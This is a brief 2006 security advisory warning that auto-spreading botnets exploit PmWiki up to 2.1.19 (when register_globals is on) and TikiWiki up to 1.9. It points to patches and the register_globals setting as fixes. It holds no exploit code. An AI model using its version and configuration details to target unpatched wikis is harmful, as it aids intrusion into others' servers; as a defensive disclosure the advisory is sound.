We have received some anonymous reports of Botnets being created out of vulnerabilities found in Pmwiki and Tikiwiki software.
The Tikiwiki exploit is hitting versions that are <= 1.9, and the Pmwiki exploit is hitting version <= 2.1.19. Both exploits were written and discovered by the same person, and both exploits have been worked into auto spreading bots.
The Pmwiki exploit can only be exploited if you have "Register_globals" turned to "On" in your php installation. However, the Tikiwiki exploit can be exploited regardless of this setting.
We have no info on where these bots are attempting to connect to, yet. However, we are seeing them in the wild.
Tikiwiki has published information on how to temporarily patch your systems to make them invulnerable: Click here for that info. From reading this webpage, it also appears that Tikiwiki is working on a permanent patch.
At the time of this posting Pmwiki had no temporary fixes or patches posted to their website. So ensure that you turn "Register_globals" to off, and restart Apache.
So, if you are running either one of these two pieces of software, please, make sure you are fixed or patched up!
Sep 5th 2006
1 decade ago